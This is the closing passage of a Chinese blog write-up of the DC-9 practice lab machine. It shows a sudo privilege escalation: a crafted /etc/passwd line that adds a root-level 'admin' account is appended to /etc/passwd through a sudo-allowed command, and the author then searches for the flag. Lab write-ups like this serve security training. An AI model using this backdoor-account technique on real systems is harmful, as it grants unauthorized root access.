<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin:Bidkpd0ZFlcfI:0:0::/root:/bin/bash</span><br></pre></td></tr></table></figure>
<p><img src="41.png" alt="图片"></p>
<p>然后执行fred用户具有root权限的命令test，第二个参数a.txt，第三个参数/etc/passwd，然后切换到我们写入/etc/passwd的用户admin</p>
<p><img src="42.png" alt="图片"></p>
<p>拿到root，最后寻找flag即可：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">find / -name *flag*</span><br><span class="line"><span class="built_in">cat</span> /root/theflag.txt</span><br></pre></td></tr></table></figure>
<p><img src="43.png" alt="图片"></p>
<p>参考文章：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/leyilea/p/18300512#%E7%AB%AF%E5%8F%A3%E6%95%B2%E9%97%A8%E6%9C%8D%E5%8A%A1">https://www.cnblogs.com/leyilea/p/18300512#%E7%AB%AF%E5%8F%A3%E6%95%B2%E9%97%A8%E6%9C%8D%E5%8A%A1</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/sinat_28521487/article/details/140043851">https://blog.csdn.net/sinat_28521487/article/details/140043851</a></p>
<ul>
<li><strong>问君能有几多愁？恰似一江春水向东流</strong></li>
</ul>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>zh1yu
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://zh1yu.xyz/2025/06/16/DC-9%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/" title="DC-9靶机复现">http://zh1yu.xyz/2025/06/16/DC-9靶机复现/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag"># 漏洞复现</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/06/15/DC-8%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/" rel="prev" title="DC-8靶机复现">
      <i class="fa fa-chevron-left"></i> DC-8靶机复现
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/06/17/DC-3-2%E9%9D%B6%E6%9C%BA%E5%A4%8D%E7%8E%B0/" rel="next" title="DC-3-2靶机复现">
      DC-3-2靶机复现 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="nav-number">1.1.</span> <span class="nav-text">端口扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="nav-number">1.2.</span> <span class="nav-text">目录扫描</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%95%B2%E9%97%A8%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86"><span class="nav-number">2.1.</span> <span class="nav-text">端口敲门的工作原理</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#hydra%E7%88%86%E7%A0%B4"><span class="nav-number">3.</span> <span class="nav-text">hydra爆破</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SUDO%E6%8F%90%E6%9D%83"><span class="nav-number">4.</span> <span class="nav-text">SUDO提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#openssl%E5%93%88%E5%B8%8C"><span class="nav-number">4.1.</span> <span class="nav-text">openssl哈希</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zh1yu"
      src="/images/zh1yu2.jpg">
  <p class="site-author-name" itemprop="name">zh1yu</p>
  <div class="site-description" itemprop="description">花有重开日,人无再少年</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">29</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="/1182418846@qq.com" title="QQ → 1182418846@qq.com"><i class="qq fa-fw"></i>QQ</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class=""></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zh1yu</span>
</div>



        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  


<!-- 引入jQuery -->
<script type="text/javascript" src="//libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>

<!-- 雪花特效 -->
<script type="text/javascript" src="/js/snow.js"></script>

</body>
</html>
